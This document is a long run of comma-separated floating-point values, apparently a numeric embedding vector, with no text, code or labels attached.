0.01531565934419632, 0.022618303075432777, -0.01000206358730793, 0.051743630319833755, -0.00872339028865099, -0.013965949416160583, -0.009852885268628597, -0.01514516957104206, -0.0015104323392733932, 0.01954948715865612, 0.0011801085202023387, -0.01283645536750555, 0.045691244304180145, 0.001978391082957387, -0.010378561913967133, -0.01122390665113926, 0.019364790990948677, 0.00610211119055748, -0.011273632757365704, -0.019279545173048973, 0.028088180348277092, -0.015201999805867672, -0.02528930827975273, -0.010897134430706501, 0.030432414263486862, 0.00191268150229007, -0.01696372777223587, -0.02983570098876953, 0.002534258645027876, -0.01164302695542574, -0.028386538848280907, -0.00418055010959506, 0.0017999096307903528, -0.004361695144325495, 0.03668370470404625, -0.0006295688217505813, 0.05995555222034454, -0.03500722348690033, 0.008034327998757362, -0.014299824833869934, 0.0012600255431607366, -0.021169139072299004, 0.005778891034424305, -0.00017859242507256567, -0.009327208623290062, -0.018299229443073273, -0.00005422150206868537, -0.00757968844845891, -0.004439836367964745, -0.015400904230773449, -0.011131557635962963, 0.023541787639260292, -0.0008635481935925782, -0.005171521566808224, 0.007213846314698458, 0.020657671615481377, -0.01433534361422062, 0.004766608122736216, 0.018285023048520088, 0.013994364067912102, -0.00844634510576725, -0.001949976198375225, 0.03489356115460396, 0.015329866670072079, -0.0191658865660429, -0.0019357686396688223, 0.008560004644095898, 0.019208507612347603, -0.042679257690906525, 0.000023128772227209993, -0.016977934166789055, 0.012687276117503643, -0.011444122530519962, -0.01276541780680418, -0.020899197086691856, -0.0039780936203897, -0.0421677902340889, 0.007693348452448845, -0.007146360818296671, -0.010449598543345928, 0.0028361675795167685, 0.06711611896753311, 0.010428288020193577, 0.020501388236880302, 0.01122390665113926, -0.01049222145229578, 0.01124521717429161, -0.003063487121835351, 0.021907929331064224, 0.028315501287579536, -0.023129772394895554, 0.03321707993745804, 0.01636701263487339, -0.0016054448205977678, 0.0165801253169775, 0.02591443620622158, 0.017091594636440277, -0.029437890276312828, -0.0044149733148515224, 0.03654162958264351, 0.018725454807281494, 0.015102547593414783, 0.0036406659055501223, -0.011998213827610016, -0.016026033088564873, 0.033785380423069, -0.007920668460428715, -0.028940629214048386, -0.020643463358283043, 0.011479641310870647, 0.004379454534500837, 0.009682395495474339, -0.0035607488825917244, -0.024252161383628845, -0.015642430633306503, 0.0005847264546900988, 0.016636954620480537, 0.0031469559762626886, 0.028969043865799904, 0.012161599472165108, -0.013056671246886253, 0.024607349187135696, 0.004457595758140087, -0.004358143545687199, -0.012175807729363441, 0.0028397194109857082, 0.0005727388779632747, 0.027690371498465538, 0.009490594267845154, -0.03665528818964958, 0.008403722196817398, -0.01950686424970627, -0.016011826694011688, 0.004979720339179039, -0.005846376530826092, -0.013383442535996437, -0.003775636898353696, -0.022149456664919853, 0.005235454998910427, -0.012253948487341404, -0.00474884919822216, -0.0049974797293543816, 0.003967437893152237, -0.011863242834806442, -0.013234264217317104, -0.031625840812921524, -0.017361536622047424, -0.025758154690265656, 0.014832605607807636, -0.024493688717484474, 0.021666401997208595, 0.012907491996884346, 0.0015352953923866153, 0.009277482517063618, 0.009547424502670765, 0.01969156228005886, 0.011493848636746407, -0.008851258084177971, -0.0017617270350456238, -0.014846812933683395, -0.02217787131667137, 0.01653750240802765, 0.03060290403664112, 0.002507619559764862, 0.003967437893152237, -0.022021587938070297, 0.004787919577211142, -0.013404753990471363, -0.005203488282859325, -0.007121497765183449, -0.014186165295541286, -0.011032105423510075, -0.034495752304792404, 0.013795459643006325, -0.014789982698857784, 0.0018016856629401445, 0.011195491068065166, -0.015954995527863503, -0.0009061705786734819, -0.00019402084581088275, -0.0024845325388014317, 0.0144632114097476, -0.0004755064728669822, 0.03696785494685173, 0.0015361834084615111, 0.00799170508980751, 0.005352666601538658, 0.0178730059415102, -0.017773553729057312, -0.006475057452917099, -0.000009871699148789048, -0.015855543315410614, -0.005150210112333298, 0.0049619609490036964, -0.008005913347005844, -0.0014509385218843818, -0.02251885086297989, -0.003395586973056197, -0.010769267566502094, 0.018142947927117348, -0.0363711379468441, 0.0007942867232486606, -0.004841197747737169, 0.04137217253446579, -0.010222279466688633, 0.004919338505715132, 0.014647908508777618, 0.013276887126266956, 0.012282363139092922, 0.009888404048979282, -0.01545773446559906, -0.0027935451362282038, 0.012857765890657902, 0.016111278906464577, -0.01220422238111496, 0.009156718850135803, -0.004564151633530855, 0.024976743385195732, 0.0006122534396126866, -0.008162194862961769, -0.01849813386797905, -0.0032943584956228733, -0.006414675619453192, 0.0025697771925479174, 0.01849813386797905, -0.010442495346069336, 0.0025893126148730516, -0.02395380474627018, -0.02445106767117977, 0.00027726776897907257, 0.002170192077755928, 0.013355027884244919, -0.029210571199655533, 0.009824469685554504, 0.030403999611735344, 0.0030031052883714437, 0.01433534361422062, -0.005313596222549677, 0.024749424308538437, -0.003427553689107299, -0.005828617140650749, -0.009071473963558674, 0.022504642605781555, 0.03091546893119812, -0.02570132538676262, 0.002845047041773796, 0.02273196168243885, 0.02874172478914261, -0.03997983783483505, 0.020899197086691856, 0.03534820303320885, 0.022774584591388702, -0.028514405712485313, -0.04455464705824852, 0.005420152097940445, 0.01154357474297285, 0.021808477118611336, -0.0032126656733453274, -0.01292170025408268, -0.004777263849973679, -0.0185407567769289, 0.013475791551172733, -0.014498729258775711, -0.011806412599980831, -0.017318913713097572, 0.020884990692138672, -0.0024809804745018482, 0.006229978520423174, -0.001371021498925984, -0.0389568991959095, -0.00014407269190996885, -0.0032890308648347855, 0.042082544416189194, -0.02983570098876953, 0.0018416441744193435, 0.009973648004233837, -0.010371457785367966, -0.0035376616287976503, -0.002328250091522932, 0.010932653211057186, 0.0009288137662224472, -0.007011389825493097, -0.018128739669919014, 0.021865306422114372, -0.03321707993745804, 0.01643805019557476, -0.03077339380979538, 0.003764981171116233, -0.008190610446035862, -0.01653750240802765, 0.00708242692053318, -0.002987121930345893, -0.009696602821350098, 0.007338161580264568, -0.03304659202694893, 0.03639955446124077, 0.00036606451612897217, 0.0070398044772446156, -0.023655448108911514, 0.011117350310087204, 0.010307524353265762, 0.0017386398976668715, -0.007984601892530918, -0.012424438260495663, 0.03029033914208412, -0.013092189095914364, 0.0020458765793591738, 0.01986205205321312, -0.035234540700912476, 0.017077386379241943, 0.009519008919596672, -0.005782443098723888, 0.012353400699794292, 0.011238113977015018, 0.015201999805867672, -0.016878481954336166, -0.010968171991407871, 0.021041272208094597, 0.005356218665838242, 0.02388276718556881, -0.0062264264561235905, -0.0018292126478627324, -0.00813378021121025, -0.008091158233582973, -0.008226129226386547, -0.01268017292022705, -0.00033076779800467193, 0.011948487721383572, 0.03077339380979538, 0.008353996090590954, -0.005398841109126806, 0.003049279563128948, -0.003988748881965876, 0.002765130018815398, -0.045265018939971924, 0.011927176266908646, -0.01780196838080883, -0.004375902935862541, -0.024067465215921402, 0.019847843796014786, -0.009412453509867191, 0.02744884416460991, 0.0058889989741146564, 0.0035873877350240946, 0.009057266637682915, -0.022163663059473038, 0.020487181842327118, -0.027335185557603836, -0.004368798807263374, -0.012026628479361534, -0.025758154690265656, 0.008829946629703045, 0.003931919112801552, 0.010549051687121391, 0.025118818506598473, -0.014747360721230507, 0.000046424040192505345, -0.0009119423921220005, -0.01562822423875332, -0.003205561777576804, -0.003736566286534071, 0.006553198676556349, 0.017404159530997276, -0.013873600400984287, -0.0513458214700222, -0.002429478568956256, -0.02074291557073593, 0.0006570958066731691, -0.00942666083574295, 0.012843558564782143, -0.02276037633419037, -0.006624235771596432, -0.000828029471449554, -0.01979101449251175, -0.023371297866106033, 0.03017668053507805, -0.0037507738452404737, -0.009241963736712933, 0.01864020898938179, 0.027931898832321167, -0.016665369272232056, 0.00012953222903888673, 0.006819588597863913, 0.002594640478491783, -0.004873164463788271, 0.005388185381889343, 0.016523296013474464, -0.014804190024733543, -0.011522263288497925, -0.007451821584254503, -0.012403126806020737, 0.02332867681980133, -0.021666401997208595, -0.004858957137912512, -0.002726059639826417, -0.014079608954489231, -0.0020085819996893406, -0.021794268861413002, -0.0026940926909446716, -0.01619652286171913, 0.0049832724034786224, -0.02423795498907566, 0.004929994232952595, 0.005302940495312214, -0.01584133692085743, -0.006705929059535265, -0.005881895311176777, -0.00483409408479929, -0.022092625498771667, -0.0015326315769925714, 0.004866060800850391, 0.010662711225450039, 0.01923692226409912, 0.02584340050816536, -0.010804785415530205, -0.008282958529889584, -0.02555925026535988, 0.006716584321111441, -0.004826989956200123, 0.012616239488124847, 0.001718216692097485, -0.024507896974682808, 0.015784505754709244, -0.004013611935079098, -0.012737002223730087, 0.00659937271848321, -0.01292170025408268, 0.037678226828575134, -0.03520612791180611, 0.006741447374224663, -0.01825660653412342, -0.04421366751194, -0.025616079568862915, 0.007906460203230381, 0.004361695144325495, 0.01545773446559906, 0.01524462178349495, -0.009433764033019543, 0.02553083561360836, 0.022405190393328667, -0.012616239488124847, -0.024422651156783104, 0.006798277609050274, -0.02276037633419037, -0.01196269504725933, -0.022334152832627296, -0.016707992181181908, -0.0162675604224205, 0.020373521372675896, 0.024948328733444214, -0.0159123744815588, 0.015287244692444801, -0.006528335623443127, 0.01646646484732628, -0.0030652631539851427, -0.02388276718556881, -0.022192077711224556, 0.022888245061039925, -0.02160957083106041, 0.0020121338311582804, -0.019435828551650047, 0.007135705091059208, 0.026312246918678284, 0.002575105056166649, 0.01538669690489769, -0.012303674593567848, -0.027761409059166908, -0.019322168081998825, -0.014662115834653378, -0.009156718850135803, 0.00036806243588216603, 0.012289467267692089, 0.0004482014919631183, -0.023413920775055885, 0.006141181569546461, -0.0067947255447506905, 0.0026301590260118246, 0.020799744874238968, 0.006524783559143543, -0.01878228411078453, 0.010797682218253613, 0.006876418367028236, -0.015585601329803467, -0.0014038762310519814, 0.02143908105790615, -0.0025893126148730516, 0.021481703966856003, -0.024138502776622772, -0.016764821484684944, -0.0010433614952489734, -0.008943606168031693, -0.0089365029707551, -0.005540915764868259, 0.017532026395201683, -0.013220056891441345, 0.001654283027164638, 0.000009996569133363664, -0.003711703233420849, 0.027392014861106873, 0.012843558564782143, 0.019123263657093048, -0.03290451690554619, 0.010868719778954983, -0.012346296571195126, -0.005441463552415371, -0.0007854070281609893, 0.01417906116694212, -0.007586792577058077, 0.007949083112180233, 0.0013861169572919607, 0.016452258452773094, 0.00191268150229007, 0.022390982136130333, 0.030517660081386566, 0.0010628968011587858, 0.004024267662316561, -0.0024649971164762974, -0.024877291172742844, -0.02304452657699585, 0.005672335159033537, -0.008616834878921509, 0.004929994232952595, 0.004166342318058014, 0.01098237931728363, 0.016253352165222168, -0.005107587669044733, -0.005203488282859325, -0.0017599511193111539, 0.0014669219963252544, -0.01741836592555046, -0.007565481122583151, 0.010172553360462189, -0.006919040810316801, 0.021481703966856003, 0.01790142059326172, 0.01277962513267994, -0.00024485698668286204, 0.013298197649419308, 0.0026727814693003893, -0.007977497763931751, 0.006862211041152477, 0.015273037366569042, -0.01026490144431591, 0.02185109816491604, -0.00961846113204956, 0.038104452192783356, 0.001654283027164638, -0.0011437018401920795, 0.012445749714970589, -0.014434795826673508, -0.028557026758790016, 0.010470909997820854, 0.015358282253146172, 0.019322168081998825, 0.003480831626802683, 0.013696007430553436, 0.0027775615453720093, -0.004912234842777252, -0.006453745998442173, 0.0020867229904979467, 0.003450640942901373, 0.0016436274163424969, 0.01794404350221157, -0.021623779088258743, -0.00968949869275093, -0.0014163077576085925, 0.011152869090437889, 0.004922890570014715, -0.0069225928746163845, -0.00010999694495694712, -0.011053416877985, -0.013404753990471363, -0.0067130327224731445, -0.002543138340115547, 0.012999841012060642, 0.006887074094265699, -0.010414080694317818, -0.0013150795130059123, 0.02158115617930889, 0.01646646484732628, -0.0029658107087016106, 0.009192237630486488, 0.010975275188684464, -0.00829006265848875, -0.02000412717461586, 0.010058892890810966, 0.0021044823806732893, -0.011302047409117222, -0.002907204907387495, 0.010399872437119484, -0.012033732607960701, 0.00780700845643878, -0.005746924318373203, -0.006229978520423174, 0.0018629553960636258, 0.005416600499302149, 0.01937899738550186, 0.013717318885028362, 0.012616239488124847, 0.019066432490944862, -0.011927176266908646, 0.012687276117503643, -0.001139261992648244, 0.0006713032489642501, -0.02756250463426113, -0.009135407395660877, 0.008993332274258137, 0.013035359792411327, -0.016736406832933426, -0.019606318324804306, -0.022078419104218483, 0.016565917059779167, -0.0012520338641479611, -0.0032250971999019384, -0.008155091665685177, 0.007686244789510965, -0.0023087149020284414, 0.015756091102957726, -0.0046493965201079845, 0.005771787371486425, -0.024507896974682808, 0.002907204907387495, -0.0037259107921272516, -0.0039532301016151905, 0.010293317027390003, 0.003203785978257656, -0.013845185749232769, 0.004034923389554024, -0.031455352902412415, -0.015656638890504837, -0.00844634510576725, 0.013632073998451233, 0.0051111397333443165, -0.010094411671161652, 0.0029658107087016106, 0.012083458714187145, -0.0014189716894179583, -0.00265857414342463, 0.00237797643058002, -0.005590641871094704, 0.010712437331676483, 0.00595293240621686, -0.004816334694623947, 0.015130962245166302, 0.01112445443868637, -0.014861020259559155, 0.008020120672881603, -0.0012520338641479611, 0.009810262359678745, -0.0049584093503654, -0.023911183699965477, -0.0028503749053925276, -0.014214579947292805, 0.009639772586524487, -0.009767640382051468, -0.0013941086363047361, -0.012971426360309124, 0.005032998509705067, -0.009824469685554504, -0.001955303829163313, 0.007863838225603104, 0.011827724054455757, 0.014370862394571304, -0.03438209369778633, -0.02710786461830139, -0.01763147860765457, 0.00007064889359753579, 0.007437613792717457, -0.011351773515343666, -0.01033593900501728, -0.0002686101070139557, -0.01133046206086874, -0.0005638592410832644, 0.0007822991465218365, 0.015727676451206207, -0.0006406683824025095, 0.005153762176632881, -0.004123719874769449, -0.006261945236474276, -0.017333121970295906, -0.006780518218874931, 0.012367608025670052, 0.022319944575428963, 0.008105365559458733, 0.003164715366438031, -0.013624969869852066, 0.00912830326706171, 0.018341852352023125, -0.018626000732183456, 0.013568139635026455, -0.0024081673473119736, 0.026837922632694244, -0.005739820655435324, -0.005501845385879278, 0.02153853513300419, 0.00814798753708601, 0.00993102602660656, 0.01360365841537714, -0.0015743660042062402, -0.013085085898637772, 0.00949769839644432, 0.0009119423921220005, -0.024067465215921402, -0.00418055010959506, 0.006428882945328951, -0.01646646484732628, 0.01417906116694212, 0.0030563834588974714, -0.012928803451359272, 0.000865768117364496, -0.004358143545687199, 0.009526113048195839, -0.016977934166789055, 0.012886181473731995, -0.005185728892683983, 0.007068219594657421, 0.03210889548063278, -0.005615504924207926, -0.0019801671151071787, -0.013838081620633602, 0.004386558197438717, -0.010698230005800724, -0.025019366294145584, 0.015429319813847542, -0.00927037838846445, -0.007302642799913883, 0.029125327244400978, 0.01744678057730198, 0.0021488808561116457, 0.02153853513300419, 0.027193110436201096, 0.008396618999540806, 0.013205849565565586, -0.018015079200267792, 0.014690530486404896, -0.002795320935547352, -0.03696785494685173, -0.009376934729516506, 0.00879442784935236, -0.011032105423510075, 0.0025040677282959223, 0.021169139072299004, 0.01660853996872902, -0.002173743909224868, -0.00007780813029967248, 0.0011783326044678688, 0.007622310891747475, 0.0062264264561235905, 0.04884530231356621, -0.0010948636336252093, 0.0008209257503040135, -0.014058297500014305, -0.003722358727827668, -0.016423841938376427, 0.005032998509705067, 0.024564726278185844, -0.0002961370919365436, 0.005672335159033537, -0.01825660653412342, 0.0010291540529578924, 0.011920073069632053, -0.006620684172958136, 0.026312246918678284, -0.010250694118440151, -0.005242558661848307, -0.006212219130247831, 0.008261648006737232, 0.013390546664595604, -0.00042733424925245345, -0.0011454777559265494, -0.0014509385218843818, -0.010499324649572372, 0.017048971727490425, -0.00022376775450538844, -0.005366874393075705, -0.011678545735776424, -0.026795299723744392, 0.002122241770848632, 0.005356218665838242, -0.007984601892530918, 0.002919636433944106, -0.012886181473731995, 0.013482894748449326, 0.012644654139876366, 0.005484085995703936, -0.002679885132238269, 0.02710786461830139, 0.017645685002207756, 0.020856576040387154, 0.014917850494384766, 0.005714957602322102, 0.018384475260972977, 0.005302940495312214, 0.0016507311956956983, 0.016097070649266243, -0.021339628845453262, 0.026425905525684357, -0.002067187801003456, -0.008986229076981544, 0.017361536622047424, 0.025331931188702583, 0.0035873877350240946, 0.019222715869545937, -0.00041956454515457153, -0.010094411671161652, -0.0055657788179814816, 0.0022163663525134325, 0.01856917142868042, -0.014505833387374878, -0.013163226656615734, 0.004294209647923708, 0.017929835245013237, -0.011380188167095184, 0.021637987345457077, 0.0002723839716054499, -0.0000178564678208204, 0.0025093955919146538, -0.0049939281307160854, -0.027363600209355354, 0.0035021428484469652, -0.008822842501103878, 0.015400904230773449, 0.0030741426162421703, -0.008822842501103878, -0.012246844358742237, -0.019208507612347603, 0.0001709336938802153, -0.0052176956087350845, -0.0006557638407684863, -0.014647908508777618, 0.025942852720618248, -0.024919914081692696, 0.008098261430859566, -0.0012342744739726186, 0.0053206998854875565, 0.020401936024427414, -0.009682395495474339, -0.010556154884397984, -0.0036015952937304974, -0.0031256447546184063, -0.009455075487494469, 0.006400468293577433, 0.0013985484838485718, -0.014789982698857784, 0.018057702109217644, 0.004294209647923708, 0.024067465215921402, 0.010435391217470169, -0.008346891961991787, -0.019563695415854454, -0.005654575768858194, -0.019052226096391678, 0.004851853009313345, 0.010137034580111504, 0.013333716429769993, -0.00595293240621686, 0.000672635214868933, 0.001071776496246457, -0.027178902179002762, -0.006041729357093573, -0.01737574301660061, -0.0025413623079657555, -0.0005900542601011693, -0.006112766917794943, 0.011117350310087204, 0.018285023048520088, -0.00708242692053318, -0.0008044983260333538, 0.005022342782467604, 0.018313437700271606, -0.0026052959728986025, 0.027505673468112946, -0.01154357474297285, 0.017233669757843018, -0.0175604410469532, -0.008417929522693157, 0.0007609879830852151, 0.001551278866827488, 0.0015193120343610644, -0.0020565323065966368, -0.012893284671008587, -0.004549944307655096, -0.048277005553245544, -0.0024756528437137604, 0.012154496274888515, 0.0020369968842715025, 0.010044685564935207, -0.017389951273798943, 0.02626962400972843, -0.007323954254388809, -0.01763147860765457, 0.000017870341253001243, 0.013291094452142715, -0.0201462022960186, 0.011074728332459927, 0.010442495346069336, -0.0009021747391670942, -0.03943995386362076, -0.01227525994181633, 0.01454845629632473, 0.005466326605528593, 0.015812920406460762, 0.005157313775271177, 0.014470314607024193, 0.0024649971164762974, 0.024465274065732956, -0.031114373356103897, -0.0165801253169775, -0.036314308643341064, 0.01780196838080883, -0.029352646321058273, -0.022419398650527, -0.007331057917326689, 0.007977497763931751, -0.0017910300521180034, -0.009376934729516506, -0.0075015476904809475, -0.0056581273674964905, -0.006198011804372072, 0.007139256689697504, -0.019492657855153084, -0.008737597614526749, 0.012744106352329254, 0.006855107378214598, 0.014044090174138546, 0.00008324693044414744, -0.008176403120160103, -0.004482458811253309, -0.013781252317130566, 0.013397649861872196, 0.006066592410206795, -0.023058734834194183, 0.009831573814153671, -0.005711405538022518, -0.009341415949165821, 0.013227161020040512, -0.012751210480928421, 0.0010984154650941491, -0.010549051687121391, -0.015486149117350578, -0.009682395495474339, 0.007402095012366772, 0.0045534963719546795, 0.0005145770264789462, 0.021950550377368927, -0.004269346594810486, 0.005363322328776121, -0.026496943086385727, -0.013646281324326992, -0.009938130155205727, -0.010364353656768799, 0.013475791551172733, -0.022533057257533073, 0.006666858214884996, -0.02514723315834999, -0.01063429657369852, -0.015358282253146172, 0.005896102637052536, -0.014086713083088398, -0.040406063199043274, 0.028628064319491386, 0.00012620234338101, -0.022163663059473038, -0.016707992181181908, 0.00004786698627867736, 0.001601892989128828, 0.005068517290055752, 0.011586196720600128, 0.007416302803903818, 0.01082609687000513, 0.001990822609513998, -0.00016838079318404198, 0.019847843796014786, -0.025587664917111397, 0.023968013003468513, 0.027576711028814316, -0.018682831898331642, -0.02357020415365696, 0.009490594267845154, -0.0071534644812345505, 0.02024565450847149, 0.008545797318220139, 0.019435828551650047, -0.007863838225603104, 0.006183804012835026, 0.00765782967209816, 0.02447948232293129, -0.01650908775627613, -0.009334311820566654, -0.006510576233267784, -0.013909119181334972, -0.005960036534816027, 0.012211325578391552, 0.039326295256614685, 0.0032144414726644754, 0.020927613601088524, 0.01612548530101776, -0.008339788764715195, -0.01226105261594057, -0.008119572885334492, 0.011373084969818592, 0.005647472105920315, 0.023229224607348442, -0.023271845653653145, 0.011678545735776424, 0.0067130327224731445, -0.013582347892224789, 0.025346137583255768, 0.022419398650527, -0.01919430121779442, 0.006570958066731691, -0.0042054131627082825, -0.0033938109409064054, 0.003764981171116233, 0.014619492925703526, -0.01255230512470007, 0.00814798753708601, -0.03622906655073166, -0.014761568047106266, -0.018966980278491974, -0.00602396996691823, 0.00027327192947268486, -0.005746924318373203, 0.0012387143215164542, 0.007544170133769512, 0.004010060336440802, -0.023698071017861366, -0.01063429657369852, 0.02237677574157715, 0.01295721810311079, 0.007537066470831633, 0.0008364651584997773, 0.018697038292884827, -0.0396672748029232, -0.007235157303512096, -0.005643920041620731, -0.014718945138156414, -0.014861020259559155, 0.009142511524260044, 0.024493688717484474, -0.018824907019734383, -0.0030013294890522957, -0.0016125485999509692, -0.0015104323392733932, 0.014008571393787861, -0.00014407269190996885, 0.0007707555778324604, -0.00935562327504158, 0.0010655607329681516, -0.018370267003774643, 0.026283832266926765, -0.006567406002432108, 0.015415111556649208, -0.004237379878759384, -0.014264306053519249, -0.0015423991717398167, 0.0020991547498852015, -0.019975712522864342, -0.017262084409594536, -0.01954948715865612, 0.004130824003368616, -0.00919934082776308, -0.021382251754403114, -0.02957996539771557, -0.012182910926640034, 0.014001468196511269, -0.010669814422726631, 0.012147392146289349, 0.004723986145108938, 0.02790348418056965, -0.0009252618765458465, -0.011259425431489944, 0.00021133621339686215, 0.028585443273186684, 0.008666560985147953, 0.003168267197906971, -0.01706317998468876, 0.01794404350221157, 0.004361695144325495, 0.024351615458726883, -0.008886776864528656, 0.0067840698175132275, -0.017816174775362015, 0.0006029297946952283, 0.0039780936203897, -0.009249066933989525, 0.010364353656768799, 0.0005585314356721938, -0.00021211318380665034, -0.02483466826379299, -0.010129930451512337, 0.016480673104524612, 0.011046312749385834, 0.007224501576274633, 0.01326978299766779, 0.02017461694777012, 0.004819886293262243, -0.01204793993383646, 0.022888245061039925, 0.009909714572131634, 0.005185728892683983, -0.00944086816161871, 0.00799170508980751, 0.016906896606087685, -0.001887818449176848, -0.006020418368279934, -0.01423589140176773, -0.012147392146289349, -0.008972021751105785, 0.02433740720152855, 0.004304865375161171, 0.02957996539771557, 0.015344074927270412, 0.01311350055038929, 0.0002370872680330649, 0.02143908105790615, 0.010890030302107334, 0.005484085995703936, -0.006400468293577433, 0.0026159517001360655, 0.01295721810311079, -0.014484521932899952, -0.023300262168049812, -0.021808477118611336, 0.020231446251273155, 0.007188983261585236, -0.012253948487341404, -0.011692753061652184, 0.0011685648933053017, 0.004457595758140087, 0.004123719874769449, -0.004979720339179039, 0.003658425295725465, -0.010790578089654446, -0.013077981770038605, -0.002447237726300955, 0.01930795982480049, 0.01605444774031639, 0.013582347892224789, -0.010115723125636578, 0.011110246181488037, -0.026028096675872803, 0.01950686424970627, 0.0034453130792826414, -0.02038772776722908, 0.010868719778954983, 0.008247439749538898, -0.0055870902724564075, -0.01797245815396309, -0.01608286425471306, 0.01433534361422062, -0.03230779990553856, -0.013191642239689827, -0.023314468562602997, 0.004549944307655096, 0.0015743660042062402, -0.029665211215615273, -0.018029287457466125, -0.0008431249298155308, -0.004329728428274393, -0.0009092785185202956, -0.004375902935862541, -0.00836110021919012, 0.012971426360309124, 0.010186760686337948, 0.016835859045386314, -0.012055044062435627, 0.01612548530101776, 0.002523602917790413, 0.0044504920952022076, 0.015642430633306503, -0.021410666406154633, -0.000053805266361450776, 0.014058297500014305, -0.011053416877985, 0.0069119371473789215, -0.018299229443073273, 0.010897134430706501, 0.028684895485639572, 0.004830542020499706, -0.021339628845453262, -0.01741836592555046, 0.02168060839176178, 0.004954857286065817, 0.029920944944024086, 0.01236050482839346, 0.009739224798977375, -0.019435828551650047, 0.014157750643789768, 0.010854512453079224, 0.022433605045080185, -0.004759504459798336, 0.006972318980842829, -0.0159123744815588, -0.00021166920487303287, 0.00503655057400465, -0.009149614721536636, -0.014505833387374878, -0.023300262168049812, 0.0068053812719881535, -0.03151218220591545, -0.025346137583255768, -0.027789823710918427, 0.02598547376692295, 0.0022057106252759695, -0.016480673104524612, -0.013355027884244919, 0.008616834878921509, 0.013241368345916271, 0.0039638858288526535, -0.034012697637081146, -0.0037188068963587284, -0.005956484470516443, -0.01895277388393879, 0.02476363070309162, 0.01720525324344635, 0.009923921898007393, -0.009121200069785118, -0.013085085898637772, -0.014917850494384766, 0.009035955183207989, 0.010165449231863022, -0.011025001294910908, -0.009142511524260044, -0.014051194302737713, 0.003789844224229455, 0.0162675604224205, -0.028301293030381203, -0.021410666406154633, 0.01015834603458643, 0.00659937271848321, -0.014591078273952007, 0.003088350174948573, 0.013141916133463383, -0.020487181842327118, 0.014775775372982025, -0.014086713083088398, -0.009817366488277912, 0.006119870580732822, 0.040860701352357864, 0.00191445741802454, 0.007878045551478863, -0.012246844358742237, -0.009447972290217876, 0.01682165265083313, 0.015273037366569042, 0.010811889544129372, -0.004585463088005781, 0.009320104494690895, -0.00695811165496707, -0.000017176616893266328, -0.006773414555937052, -0.012793832458555698, 0.008623938076198101, -0.001203195657581091, 0.012715691700577736, 0.01773093082010746, 0.009533216245472431, 0.0058889989741146564, -0.010321731679141521, -0.0008724278304725885, 0.0029249642975628376, -0.0021932790987193584, 0.00354476529173553, -0.0009607805986888707, 0.003867985447868705, -0.027818238362669945, -0.004592566750943661, -0.0011179507710039616, 0.005771787371486425, 0.024976743385195732, -0.0020529802422970533, -0.020416144281625748, 0.017986664548516273, -0.0007192534976638854, -0.012481268495321274, -0.019435828551650047, 0.005984899587929249, 0.005445015151053667, 0.020899197086691856, 0.002157760551199317, -0.01574188470840454, 0.016551710665225983, 0.01171406451612711, 0.011429915204644203, -0.0304892435669899, 0.0017608391353860497, -0.0027491466607898474, 0.012644654139876366, 0.009234859608113766, -0.01919430121779442, -0.03415477275848389, 0.01930795982480049, 0.010293317027390003, 0.005832169204950333, -0.02067187801003456, -0.005508949048817158, 0.003839570563286543, 0.025133024901151657, 0.03844543173909187, 0.0006535439169965684, -0.005754027981311083, -0.005832169204950333, -0.024067465215921402, -0.0010433614952489734, 0.005516052711755037, -0.0007938427734188735, -0.036598458886146545, -0.005299388896673918, 0.008730494417250156, 0.03682577982544899, 0.0019446483347564936, -0.018526548519730568, 0.009000436402857304, 0.017475195229053497, 0.005885446909815073, 0.009575839154422283, 0.004581911023706198, 0.004386558197438717, 0.007920668460428715, -0.0006983862840570509, -0.019819429144263268, -0.004073993768543005, 0.006308119744062424, 0.0030315201729536057, -0.017674101516604424, 0.010605880990624428, -0.012651757337152958, -0.023754900321364403, 0.005739820655435324, 0.017404159530997276, -0.014974679797887802, 0.01839868165552616, -0.009412453509867191, -0.0020210135262459517, 0.00863814540207386, 0.03199523687362671, 0.006372053176164627, 0.018128739669919014, -0.0016578348586335778, 0.0038750891108065844, 0.020586634054780006, -0.00594582874327898, 0.0005714069702662528, -0.03534820303320885, 0.014690530486404896, -0.02926740236580372, 0.0023495613131672144, -0.021424874663352966, 0.010598777793347836, -0.023726485669612885, 0.014377966523170471, 0.02835812233388424, 0.017816174775362015, -0.011927176266908646, -0.014789982698857784, -0.008851258084177971, -0.012324986048042774, -0.0012253948953002691, -0.019222715869545937, -0.00361935468390584, -0.005345562938600779, 0.007078875321894884, -0.02545979805290699, -0.014747360721230507, -0.005050757899880409, -0.005086276680231094, 0.0021240178029984236, -0.006830244325101376, 0.006322327069938183, 0.007242260966449976, -0.010968171991407871, 0.0034222258254885674, -0.0006810709019191563, -0.004127271939069033, -0.01643805019557476, -0.002038772916421294, -0.0005789546412415802, -0.01056325901299715, -0.009490594267845154, 0.010747956112027168, -0.0031327486503869295, 0.0031469559762626886, -0.005928069353103638, -0.022689340636134148, 0.02321501635015011, -0.0022163663525134325, 0.0043936618603765965, 0.021254384890198708, -0.012758313678205013, -0.0008502286509610713, 0.0006348966271616518, 0.014385069720447063, -0.0022714203223586082, -0.020060956478118896, 0.009739224798977375, 0.011096038855612278, -0.003764981171116233, -0.006176700349897146, -0.014946265146136284, -0.01334082055836916, 0.005970691796392202, 0.006755655165761709, 0.02347075194120407, -0.022390982136130333, 0.0001397438463754952, -0.00297291437163949, 0.00237442459911108, -0.005338459275662899, -0.020117785781621933, -0.009071473963558674, 0.013475791551172733, 0.003722358727827668, -0.003244632389396429, 0.009753432124853134, 0.0024099431466311216, -0.015585601329803467, -0.004443388432264328, -0.02538876049220562, -0.0048802681267261505, 0.02126859314739704, -0.013973052613437176, 0.009291689842939377, -0.009675291366875172, 0.015187792479991913, -0.020160408690571785, -0.003594491630792618, 0.0015406232560053468, 0.008346891961991787, 0.011884554289281368, 0.0033014623913913965, -0.0021488808561116457, -0.008126676082611084, 0.005938725080341101, -0.019279545173048973, -0.008325581438839436, 0.007430510129779577, -0.007309746462851763, -0.023484958335757256, 0.004294209647923708, -0.005828617140650749, 0.007085978984832764, 0.005292284768074751, 0.011685648933053017, -0.006098559126257896, 0.023584410548210144, -0.000025154447939712554, -0.015954995527863503, 0.03693943843245506, 0.01082609687000513, 0.03242146223783493, 0.012644654139876366, -0.0001698237465461716, -0.0003787180467043072, -0.015116754919290543, -0.009249066933989525, -0.013859393075108528, -0.008623938076198101, 0.015514564700424671, 0.00814798753708601, -0.027193110436201096, 0.03563234955072403, -0.002322922460734844, -0.018981188535690308, 0.003617578651756048, -0.016111278906464577, 0.011564886197447777, -0.011202595196664333, 0.00603107362985611, 0.03651321306824684, -0.0012422662694007158, 0.01909484900534153, -0.039326295256614685, 0.001590349362231791, -0.007139256689697504, 